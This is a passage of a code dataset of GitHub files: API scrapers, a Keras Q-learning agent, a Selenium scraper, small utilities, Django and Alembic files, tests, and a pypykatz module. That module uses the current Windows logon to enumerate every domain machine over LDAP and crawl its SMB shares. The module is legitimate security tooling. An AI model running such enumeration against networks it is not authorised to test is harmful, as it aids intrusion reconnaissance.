"usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}]}
+{"seq_id": "29232882305", "text": "#!/usr/bin/python3\n'''\nNew module, used for working with ncbi data.\n'''\nimport pandas as pd\nimport numpy as np\nimport requests\nimport os\nimport sys\nimport string\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\n\ntry:\n API = os.environ['ELSKEY']\nexcept:\n print(\"Need to source the API keys!\")\n\ndef get_citedby(PMID):\n '''\n Get number of citations for an articles based on PMC code. Uses Elsevier API.\n '''\n try: \n scopus = requests.get('http://api.elsevier.com/content/search/scopus?query=PMID(%s)&field=citedby-count' % PMID, headers={'X-ELS-APIKEY':API})\n return scopus.json()['search-results']['entry'][0]['citedby-count']\n except Exception as e:\n print(e)\n return np.nan\n\ndef create_scopus_link(pmids):\n '''\n Creates a link to make a query about 25 articles (based on PMC codes).\n '''\n beg = 'http://api.elsevier.com/content/search/scopus?query=PMID(%s)' % pmids[0]\n final = [beg]\n end = '&field=citedby-count'\n for l in pmids[1:]:\n final.append('+OR+PMID(%s)' % l)\n return ''.join(final)\n\ndef get_25_citedby(pmids, output):\n '''\n Records info about 25 articles as a tsv file\n '''\n link = create_scopus_link(pmids)\n try:\n json = requests.get(link, headers={'X-ELS-APIKEY':API}).json()['search-results']['entry']\n except:\n print(\"Unable to send request\")\n return\n for pmid, info in zip(pmids,json):\n try:\n date = info['prism:coverDate']\n citedby = info['citedby-count']\n title = info['dc:title']\n pubmed = info['pubmed-id']\n with open(output, 'a+') as output:\n output.write('%s\\t%s\\t%s\\t%s\\t%s\\n' % (pmid, date, citedby, title, pubmed))\n except:\n print('Unable to retrieve article with PMID %s' % pmid)\n\n\ndef clean_text(location, new_location):\n '''\n Clean a textfile, save a new one\n '''\n stop = stopwords.words('english')\n def remove_stop(word):\n if word not in stop:\n return word\n else:\n return np.nan\n stemmer = PorterStemmer()\n file = open(location, 'r').read()\n l = file.split('====')\n body = l[2]\n body = pd.Series(body.split())\n body = body.str.lower()\n body = body[~body.str.contains('www|http|@')]\n body = body.str.replace('[^\\w\\s]', '')\n body = body[~body.str.contains('^\\d+$')]\n body = body.apply(remove_stop).dropna()\n body = body.apply(stemmer.stem)\n body.to_csv(new_location, index=False)\n return body\n\ndef clean_all_files_in_dir(inpdir, outdir):\n for f in os.listdir(inpdir):\n try:\n clean_text(inpdir+f, outdir+f)\n except Exception as e:\n print(e)\n\n", "repo_name": "ilsenatorov/articles", "sub_path": "mining.py", "file_name": "mining.py", "file_ext": "py", "file_size_in_byte": 2734, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 28, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 67, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 67, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 72, "usage_type": "attribute"}, {"api_name": "nltk.stem.PorterStemmer", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 77, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "74594433767", "text": "import copy\nimport random\n\nimport numpy as np\nfrom keras.layers import Dense\nfrom keras.models import Sequential\nfrom keras.optimizers import Adadelta\n\n# A system for steering based on the center line of the road using a deep Q-network, meaning the network\n# gradually learns while attempting to drive the car\n# Created by brendon-ai, January 2018\n\n# The base discount rate, which should be between 0 and 1\nBASE_DISCOUNT = 0.8\n\n# The initial value exploration rate used for the reinforcement learning algorithm\nEPSILON_INITIAL = 1.0\n# The decay value by which the epsilon is multiplied every iteration\nEPSILON_DECAY = 0.9999\n# The minimum value that epsilon can decay to\nEPSILON_MIN = 0.01\n# The minimum number of examples in the memory before training begins\nMIN_TRAINING_EXAMPLES = 100\n\n\n# The deep Q-network agent, including a neural network but handling training and other functionality\nclass DeepQNetworkAgent:\n\n # Initialize the agent including the model and other attributes\n def __init__(self, state_size, action_size):\n # Initialize the value of epsilon which will be changed over the life of the agent\n self.epsilon = EPSILON_INITIAL\n\n # Initialize the agent's memory, which will store past time steps for training\n self.memory = []\n\n # Set the provided state size and action size as global variables\n self.state_size = state_size\n self.action_size = action_size\n\n # Use a rectified linear activation function\n activation = 'tanh'\n # Create the neural network model simply using a series of dense layers\n self.model = Sequential([\n Dense(3, input_shape=(self.state_size,), activation=activation),\n Dense(5, activation=activation),\n Dense(self.action_size)\n ])\n # Use an Adam optimizer with the predefined learning rate\n optimizer = Adadelta()\n # Compile the model with a mean squared error loss\n self.model.compile(\n loss='mse',\n optimizer=optimizer\n )\n\n # Add a set of values packaged as a single time step to the memory, and update rewards for previous memories\n def remember(self, state, action, reward, done):\n # Add the new value to the memory as it is (it will be updated to accommodate future rewards later)\n self.memory.append([state, action, reward, done])\n # Get the index of the most recent element in the memory\n max_memory_index = len(self.memory) - 1\n # Iterate over all indices in the array, excluding the one that was just added, in reverse\n for memory_index in reversed(range(max_memory_index)):\n # If the game ended at this example, it had no bearing on future rewards, so iteration should stop\n memory_example = self.memory[memory_index]\n if memory_example[3]:\n break\n\n # Get the age of this memory example (the number of examples that have been added since this one)\n age = max_memory_index - memory_index\n # Take the discount to the power of the age of this example\n # This will exponentially discount the value of the current reward for older examples in the memory\n discount = BASE_DISCOUNT ** age\n # Multiply the current reward by this discount and add it to the reward for this previous example\n memory_example[2] += reward * discount\n\n # Run a prediction on a state and return an array of predicted rewards for each possible action\n def predict(self, state):\n # Use the neural network to process the state directly\n network_output = self.model.predict(state)\n # Return the first element of the output on the first axis, effectively removing the single-element batch axis\n return network_output[0]\n\n 
# Act based on a provided state, choosing either to explore or to act based on past learning\n def act(self, state):\n # Choose randomly whether or not to act randomly, depending on the exploration rate\n if np.random.rand() <= self.epsilon:\n # Choose a random value less than the number of valid actions\n return random.randrange(self.action_size)\n # Otherwise, an action must be chosen based on the current state\n else:\n # Use the neural network to predict the reward for each of the valid actions\n reward_predictions = self.predict(state)\n # The actions is the index of the maximum predicted reward\n return np.argmax(reward_predictions)\n\n # Decay the epsilon so that actions become more frequently determined by the network rather than randomly\n def decay(self):\n # If the epsilon has not already gone as low as it is allowed to\n if self.epsilon > EPSILON_MIN:\n # Multiply it by the decay factor\n self.epsilon *= EPSILON_DECAY\n\n # Train the neural network model; this is to be iterated over, and yields the loss or None on each iteration\n def train(self):\n # Run an infinite loop in which the training is done\n while True:\n # Yield immediately if there is less than a specified number of training examples in the memory, so that the\n # network does not quickly overfit on a very small number of examples\n if len(self.memory) < MIN_TRAINING_EXAMPLES:\n yield None\n\n # Iterate over the entire memory in a random order\n memory_random = copy.copy(self.memory)\n random.shuffle(memory_random)\n for state, action, reward, _ in memory_random:\n # Make a prediction based on this state, but replace the reward for the action on this time step\n target_prediction = self.model.predict(state)\n target_prediction[0, action] = reward\n # Train the model based on this modified prediction, getting the most recent loss value\n loss = self.model.fit(x=state, y=target_prediction, epochs=1, verbose=0).history['loss'][0]\n # Yield the loss to the calling loop so that inference can be done between any pair of training runs\n yield loss\n", "repo_name": "bfmat/LaneDetection", "sub_path": "model/deep_q_network_agent.py", "file_name": "deep_q_network_agent.py", "file_ext": "py", "file_size_in_byte": 6194, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "keras.models.Sequential", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.optimizers.Adadelta", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 88, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 96, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 115, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 116, "usage_type": "call"}]}
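remember() above folds each new reward into older memory entries, discounted exponentially by age. The arithmetic is easiest to check on a toy memory (the values below are illustrative):

BASE_DISCOUNT = 0.8  # same constant as the agent

# Toy memory entries: [state, action, accumulated_reward, done]
memory = [[None, 0, 1.0, False], [None, 1, 0.5, False], [None, 0, 0.0, False]]

# A new reward of 1.0 arrives with the most recent time step
reward = 1.0
max_memory_index = len(memory) - 1
for memory_index in reversed(range(max_memory_index)):
    if memory[memory_index][3]:  # an episode boundary stops the propagation
        break
    age = max_memory_index - memory_index
    # Older entries receive exponentially less of the new reward
    memory[memory_index][2] += reward * (BASE_DISCOUNT ** age)

print([round(entry[2], 3) for entry in memory])  # [1.64, 1.3, 0.0]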
+{"seq_id": "74899928169", "text": "import csv\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\n\n\nclass EscolaScraper:\n def __init__(self, nome, endereco, cidade, estado, telefone, cep, nivel_escolaridade):\n self.nome = nome\n self.endereco = endereco\n self.cidade = cidade\n self.estado = estado\n self.telefone = telefone\n self.cep = cep\n self.nivel_escolaridade = nivel_escolaridade\n\n\ndef coletar_escolas():\n escolas = []\n\n\n service = Service('/Users/joaosilva/Downloads/chromedriver_mac64/chromedriver') # Substitua pelo caminho do chromedriver\n options = Options()\n options.add_argument('--headless') # Executar o Chrome em modo headless (sem interface gráfica)\n driver = webdriver.Chrome(service=service, options=options)\n\n\n driver.get('https://www.google.com')\n search_box = driver.find_element(By.NAME, 'q')\n search_box.send_keys('escolas de tres lagoas')\n search_box.send_keys(Keys.RETURN)\n\n resultados = driver.find_elements(By.CLASS_NAME, 'g')\n\n for resultado in resultados:\n try:\n nome = resultado.find_element(By.TAG_NAME, 'h3').text\n endereco = resultado.find_element(By.CSS_SELECTOR, 'div.VkpGBb').text\n cidade_estado = resultado.find_element(By.CSS_SELECTOR, 'span.B6fmyf').text\n telefone = resultado.find_element(By.CSS_SELECTOR, 'div.xpdopen > div > div > div > span').text\n cep = resultado.find_element(By.CSS_SELECTOR, 'span.LrzXr').get_attribute('data-attrid')\n nivel_escolaridade = resultado.find_element(By.CSS_SELECTOR, 'div.qsm0tb').text\n\n cidade_estado_split = cidade_estado.split(',')\n cidade = cidade_estado_split[0].strip()\n estado = cidade_estado_split[1].strip()\n\n escola = EscolaScraper(nome, endereco, cidade, estado, telefone, cep, nivel_escolaridade)\n escolas.append(escola)\n except Exception as e:\n print(f\"Erro ao extrair informações: {str(e)}\")\n\n driver.quit()\n\n return escolas\n\n\ndef salvar_csv(escolas):\n with open('escolas.csv', 'w', newline='', encoding='utf-8') as file:\n writer = csv.writer(file)\n writer.writerow(['Nome', 'Endereço', 'Cidade', 'Estado', 'Telefone', 'CEP', 'Nível de Escolaridade'])\n for escola in escolas:\n writer.writerow([escola.nome, escola.endereco, escola.cidade, escola.estado, escola.telefone,\n escola.cep, escola.nivel_escolaridade])\n\n\nescolas = coletar_escolas()\nsalvar_csv(escolas)", "repo_name": "JPGSilva/web-scraping", "sub_path": "EscolaScraper.py", "file_name": "EscolaScraper.py", "file_ext": "py", "file_size_in_byte": 2702, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 25, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 27, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 27, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.NAME", "line_number": 31, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 31, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.RETURN", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 33, "usage_type": "name"}, {"api_name": 
"selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 35, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 35, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 40, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 40, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 41, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 42, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 42, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 43, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 43, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 44, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 44, "usage_type": "name"}, {"api_name": "csv.writer", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "6679857745", "text": "from collections import Counter\nimport os\n\n\ndef get_words_perline(file_name):\n \"\"\"\n 获取每行的单词\n :type file_name: 文件名\n \"\"\"\n lines = []\n\n if os.path.exists(file_name):\n with open(file_name, 'r') as f:\n for line in f:\n lines.append(line.split())\n return lines\n\n\ndef get_word_count(file_name):\n \"\"\"\n 统计单词出现次数\n :type file_name: 文件名\n \"\"\"\n lines = get_words_perline(file_name)\n cnt = Counter()\n for line in lines:\n cnt = cnt + Counter(line)\n return cnt\n\n\ndef get_import_word(file_name):\n cnt = get_word_count(file_name)\n print(cnt)\n import_list = cnt.most_common(1)\n print('the most import word is:' + import_list[0][0])\n\nif __name__ == \"__main__\":\n get_import_word(\"word.txt\")\n", "repo_name": "Sesshoumaru/python-exercise", "sub_path": "0007/codes/0006.py", "file_name": "0006.py", "file_ext": "py", "file_size_in_byte": 810, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 25, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "23096688333", "text": "from django.conf.urls import include, url\nfrom vsf_user.front import views\n\n\nurlpatterns = [\n url(\n r'^list-apikey/$',\n views.ListAPIUsers.as_view(),\n name='api-users-list'\n ),\n url(\n r'^list-apikey-ajax/$',\n views.APIUsersDataTableAjax.as_view(),\n ),\n url(\n r'^(?P[0-9]+)/delete-apikey/$',\n views.DeleteAPIUsers.as_view(),\n name='api-users-delete'\n ),\n\n]\n", "repo_name": "VEinteligente/vsf-incidents-server", "sub_path": "vsf_user/front/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 439, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "vsf_user.front.views.ListAPIUsers.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "vsf_user.front.views.ListAPIUsers", "line_number": 8, "usage_type": "attribute"}, {"api_name": "vsf_user.front.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "vsf_user.front.views.APIUsersDataTableAjax.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "vsf_user.front.views.APIUsersDataTableAjax", "line_number": 13, "usage_type": "attribute"}, {"api_name": "vsf_user.front.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "vsf_user.front.views.DeleteAPIUsers.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "vsf_user.front.views.DeleteAPIUsers", "line_number": 17, "usage_type": "attribute"}, {"api_name": "vsf_user.front.views", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "10461658798", "text": "from PIL import ImageFont, ImageDraw, Image\nimport argparse\n# https://blog.gtwang.org/programming/opencv-drawing-functions-tutorial/\n\ndef paste(name, output):\n image = Image.open(\"./base.png\")\n drawer = ImageDraw.Draw(image)\n name_len = len(name)\n if name_len == 4:\n font = ImageFont.truetype(\"./標楷體.ttf\", 68)\n drawer.text((922, 853), name, font=font, fill=(0, 0, 0))\n elif name_len == 5:\n font = ImageFont.truetype(\"./標楷體.ttf\", 55)\n drawer.text((918, 858), name, font=font, fill=(0, 0, 0))\n elif name_len == 6:\n font = ImageFont.truetype(\"./標楷體.ttf\", 50)\n drawer.text((912, 862), name, font=font, fill=(0, 0, 0))\n else:\n raise NotImplementedError\n image.save(output)\n\ndef main(args):\n name = args.name + \"同學\" if args.student else args.name\n paste(name, args.output)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"name\", type=str)\n parser.add_argument(\"output\", type=str)\n parser.add_argument(\"--student\", action=\"store_true\", default=False)\n args = parser.parse_args()\n \n main(args)\n", "repo_name": "jimlinntu/gbc-paste", "sub_path": "paste.py", "file_name": "paste.py", "file_ext": "py", "file_size_in_byte": 1145, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.Image.open", "line_number": 6, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 6, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 10, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 13, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 13, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 16, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "4585676599", "text": "\"\"\"empty message\n\nRevision ID: 4744a3a56f55\nRevises: 97fd285963c7\nCreate Date: 2020-01-18 20:10:06.316710\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4744a3a56f55'\ndown_revision = '97fd285963c7'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('person', sa.Column('address', sa.String(length=200), nullable=False))\n op.add_column('person', sa.Column('phone', sa.String(length=20), nullable=False))\n op.create_unique_constraint(None, 'person', ['address'])\n op.create_unique_constraint(None, 'person', ['phone'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'person', type_='unique')\n op.drop_constraint(None, 'person', type_='unique')\n op.drop_column('person', 'phone')\n op.drop_column('person', 'address')\n # ### end Alembic commands ###\n", "repo_name": "Rhpozzo/FlaskAPI", "sub_path": "migrations/versions/4744a3a56f55_.py", "file_name": "4744a3a56f55_.py", "file_ext": "py", "file_size_in_byte": 1018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 24, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 24, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 30, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "20124023132", "text": "from msldap.commons.factory import LDAPConnectionFactory\nfrom aiosmb.examples.smbshareenum import SMBFileEnum, ListTargetGen, FileTargetGen\n\ndef get_smb_url(authmethod = 'ntlm', protocol_version = '2', host = None):\n\tfrom winacl.functions.highlevel import get_logon_info\n\tinfo = get_logon_info()\n\tlogonserver = info['logonserver']\n\tif host is not None:\n\t\tlogonserver = host\n\n\treturn 'smb%s+sspi-%s://%s\\\\%s@%s' % (protocol_version, authmethod, info['domain'], info['username'], logonserver)\n\n\ndef get_ldap_url(authmethod = 'ntlm', host = None):\n\tfrom winacl.functions.highlevel import get_logon_info\n\tinfo = get_logon_info()\n\n\tlogonserver = info['logonserver']\n\tif host is not None:\n\t\tlogonserver = host\n\n\treturn 'ldap+sspi-%s://%s\\\\%s@%s' % (authmethod, info['domain'], info['username'], logonserver)\n\nclass LDAPTargetGen:\n\tdef __init__(self, url):\n\t\tself.url = url\n\t\n\tasync def generate(self):\n\t\ttry:\n\t\t\tconn_url = LDAPConnectionFactory.from_url(self.url)\n\t\t\tconnection = conn_url.get_client()\n\t\t\t_, err = await connection.connect()\n\t\t\tif err is not None:\n\t\t\t\traise err\n\t\t\t\n\t\t\tadinfo = connection._ldapinfo\n\t\t\tdomain_name = adinfo.distinguishedName.replace('DC','').replace('=','').replace(',','.')\n\n\t\t\tasync for machine, err in connection.get_all_machines(attrs=['sAMAccountName', 'dNSHostName', 'objectSid']):\n\t\t\t\tif err is not None:\n\t\t\t\t\traise err\n\t\t\t\t\t\n\t\t\t\tdns = machine.dNSHostName\n\t\t\t\tif dns is None:\n\t\t\t\t\tdns = '%s.%s' % (machine.sAMAccountName[:-1], domain_name)\n\t\t\t\t\n\t\t\t\tyield str(machine.objectSid), str(dns), None\n\n\t\texcept Exception as e:\n\t\t\tyield None, None, e\n\t\n\nasync def shareenum(smb_url, ldap_url = None, targets = None, smb_worker_count = 10, depth = 3, out_file = None, progress = False, max_items = None, dirsd = False, filesd = False, authmethod = 'ntlm', protocol_version = '2', output_type = 'str', max_runtime = None, exclude_share = ['print$'], exclude_dir = [], exclude_target = []):\n\n\tif smb_url == 'auto':\n\t\tsmb_url = get_smb_url(authmethod=authmethod, protocol_version=protocol_version)\n\t\n\tenumerator = SMBFileEnum(\n\t\tsmb_url,\n\t\tworker_count = smb_worker_count, \n\t\tdepth = depth, \n\t\tout_file = out_file, \n\t\tshow_pbar = progress,\n\t\tmax_items = max_items,\n\t\tfetch_dir_sd = dirsd,\n\t\tfetch_file_sd = filesd,\n\t\toutput_type = output_type,\n\t\tmax_runtime = max_runtime,\n\t\texclude_share = exclude_share,\n\t\texclude_dir = exclude_dir,\n\t\texclude_target = exclude_target\n\t)\n\t\n\tnotfile = []\n\tif targets is not None:\n\t\tfor target in targets:\n\t\t\ttry:\n\t\t\t\tf = open(target, 'r')\n\t\t\t\tf.close()\n\t\t\t\tenumerator.target_gens.append(FileTargetGen(target))\n\t\t\texcept:\n\t\t\t\tnotfile.append(target)\n\t\t\n\t\tif len(notfile) > 0:\n\t\t\tenumerator.target_gens.append(ListTargetGen(notfile))\n\t\n\tif ldap_url is not None:\n\t\tif ldap_url == 'auto':\n\t\t\tldap_url = get_ldap_url(authmethod=authmethod)\n\t\tenumerator.target_gens.append(LDAPTargetGen(ldap_url))\n\n\tif len(enumerator.target_gens) == 0:\n\t\tenumerator.enum_url = True\n\t\t#raise Exception('No suitable targets found!')\n\n\tawait enumerator.run()\n", "repo_name": "skelsec/pypykatz", "sub_path": "pypykatz/smb/shareenum.py", "file_name": "shareenum.py", "file_ext": "py", "file_size_in_byte": 2987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2505, "dataset": "github-code", "pt": 
"53", "api": [{"api_name": "winacl.functions.highlevel.get_logon_info", "line_number": 6, "usage_type": "call"}, {"api_name": "winacl.functions.highlevel.get_logon_info", "line_number": 16, "usage_type": "call"}, {"api_name": "msldap.commons.factory.LDAPConnectionFactory.from_url", "line_number": 30, "usage_type": "call"}, {"api_name": "msldap.commons.factory.LDAPConnectionFactory", "line_number": 30, "usage_type": "name"}, {"api_name": "aiosmb.examples.smbshareenum.SMBFileEnum", "line_number": 58, "usage_type": "call"}, {"api_name": "aiosmb.examples.smbshareenum.FileTargetGen", "line_number": 80, "usage_type": "call"}, {"api_name": "aiosmb.examples.smbshareenum.ListTargetGen", "line_number": 85, "usage_type": "call"}]}
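The LDAPTargetGen.generate() coroutine in the record above reports failures through the third slot of each yielded tuple instead of raising mid-stream, so callers check the error on every iteration. A minimal self-contained sketch of consuming such an async generator; the stand-in generator below replaces the real LDAP connection and uses made-up host data.

import asyncio

async def generate_targets():
    # Stand-in for LDAPTargetGen.generate(): yields (sid, hostname, error)
    # tuples, signalling failure through the error slot rather than raising.
    machines = [('S-1-5-21-1', 'ws01.corp.local'), ('S-1-5-21-2', 'ws02.corp.local')]
    for sid, dns in machines:
        yield sid, dns, None

async def main():
    async for sid, hostname, err in generate_targets():
        if err is not None:
            print('enumeration failed:', err)
            break
        print(sid, hostname)

asyncio.run(main())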
+{"seq_id": "34256755892", "text": "#!/usr/bin/env python\n\"\"\"Tests for `dlink` package.\"\"\"\nimport os\nfrom argparse import Namespace\nfrom pathlib import Path\n\nimport pytest\n\nfrom dlink import core\n\n\n@pytest.fixture\ndef populate(tmp_path):\n # At the risk of this not being super clear.\n # 1. Make a directory and a bunch of files.\n base = tmp_path / \"base\"\n base.mkdir()\n for i in range(5):\n # This is kinda sloppy because / makes a new directory and I'm genuinely\n # unsure of what the clean way to concatenate strings and Paths together\n (base / (str(i) + \".txt\")).write_text(\"Foo\")\n\n return base\n\n\n@pytest.fixture\ndef args(tmp_path, populate):\n namespace = Namespace()\n namespace.destination = populate\n namespace.log = True\n namespace.log_level = 10\n namespace.recursive = False\n namespace.glob_pattern = \"\"\n namespace.source = tmp_path / \"src\"\n namespace.source.mkdir()\n return namespace\n\n\ndef test_symlink(tmp_path):\n d = tmp_path\n d.mkdir(exist_ok=True)\n dest = d / \"any_file.txt\"\n dest.write_text(\"Probably not necessary\")\n # Start with a path object. Then parameterize this?\n src = tmp_path / \"link\"\n core.symlink(src, dest)\n assert Path.is_symlink(src)\n assert Path.is_file(dest)\n\n\ndef test_generate_dest(populate):\n ret = core.generate_dest(populate)\n for i in range(5):\n file = populate / (str(i) + \".txt\")\n assert file == ret[i]\n\n\ndef test_main(args):\n os.chdir(args.source)\n core.main(args)\n assert \"0.txt\" in os.listdir()\n\n\ndef test_logging(args, caplog):\n os.chdir(args.source)\n core.main(args)\n for record in caplog.records:\n assert record.levelname != \"ERROR\"\n\n\nif __name__ == \"__main__\":\n pytest.main()\n", "repo_name": "farisachugthai/dlink", "sub_path": "tests/test_dlink.py", "file_name": "test_dlink.py", "file_ext": "py", "file_size_in_byte": 1725, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 12, "usage_type": "attribute"}, {"api_name": "argparse.Namespace", "line_number": 28, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "attribute"}, {"api_name": "dlink.core.symlink", "line_number": 46, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 46, "usage_type": "name"}, {"api_name": "pathlib.Path.is_symlink", "line_number": 47, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 47, "usage_type": "name"}, {"api_name": "pathlib.Path.is_file", "line_number": 48, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 48, "usage_type": "name"}, {"api_name": "dlink.core.generate_dest", "line_number": 52, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 52, 